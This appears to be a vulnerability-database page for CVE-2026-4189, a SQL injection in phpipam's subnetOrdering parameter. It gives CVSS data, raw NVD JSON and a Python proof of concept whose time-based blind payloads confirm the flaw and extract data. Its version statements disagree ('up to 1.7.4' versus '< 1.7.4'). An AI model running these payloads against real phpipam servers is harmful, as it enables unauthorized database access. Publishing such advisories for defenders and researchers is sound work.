Security Vulnerability Report
中文
CVE-2026-4189 CVSS 4.7 MEDIUM

CVE-2026-4189

Published: 2026-03-16 14:20:02
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A weakness has been identified in phpipam up to 1.7.4. The impacted element is an unknown function of the file app/admin/sections/edit-result.php of the component Section Handler. Executing a manipulation of the argument subnetOrdering can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

phpipam < 1.7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-4189 SQL Injection PoC for phpipam # Target: phpipam <= 1.7.4 # File: app/admin/sections/edit-result.php # Parameter: subnetOrdering import requests import sys def exploit_sql_injection(target_url, cookie): """ SQL Injection PoC for CVE-2026-4189 This PoC demonstrates time-based blind SQL injection """ # Target endpoint endpoint = f"{target_url}/app/admin/sections/edit-result.php" # Malicious payload for time-based blind SQL injection # Using SLEEP() function to confirm vulnerability payload = { 'subnetOrdering': "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE SLEEP(0) END) AND '1'='1" } headers = { 'Cookie': cookie, 'Content-Type': 'application/x-www-form-urlencoded' } try: print(f"[*] Sending exploit request to {endpoint}") response = requests.post(endpoint, data=payload, headers=headers, timeout=10) print(f"[*] Response status: {response.status_code}") # If vulnerable, the request will take ~5 seconds if response.elapsed.total_seconds() >= 5: print("[+] Target is VULNERABLE to CVE-2026-4189") return True else: print("[-] Target may not be vulnerable or already patched") return False except requests.exceptions.Timeout: print("[+] Target is VULNERABLE - Request timed out as expected") return True except Exception as e: print(f"[-] Error: {str(e)}") return False def extract_data(target_url, cookie, query): """ Extract data using SQL injection Example: Extract database version """ endpoint = f"{target_url}/app/admin/sections/edit-result.php" # Build extraction payload payload = { 'subnetOrdering': f"1' AND (SELECT CASE WHEN {query} THEN SLEEP(3) ELSE SLEEP(0) END) AND '1'='1" } headers = { 'Cookie': cookie, 'Content-Type': 'application/x-www-form-urlencoded' } try: response = requests.post(endpoint, data=payload, headers=headers, timeout=10) return response.elapsed.total_seconds() >= 3 except: return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2026-4189.py <target_url> <cookie>") print("Example: python cve-2026-4189.py http://target.com 'phpipam=xxx'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] print("="*60) print("CVE-2026-4189 SQL Injection PoC") print("Target: phpipam <= 1.7.4") print("="*60) exploit_sql_injection(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4189", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:01.943", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in phpipam up to 1.7.4. The impacted element is an unknown function of the file app/admin/sections/edit-result.php of the component Section Handler. Executing a manipulation of the argument subnetOrdering can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en phpipam hasta la versión 1.7.4. El elemento afectado es una función desconocida del archivo app/admin/sections/edit-result.php del componente Gestor de Secciones. La ejecución de una manipulación del argumento subnetOrdering puede conducir a una inyección SQL. El ataque puede ser lanzado de forma remota. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques. El proveedor fue contactado con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://drive.google.com/file/d/1yxx2iUTG1ebMKo3W9bHlCFFxUJAhkwEk/view?usp=drive_link", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351095", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351095", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769933", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.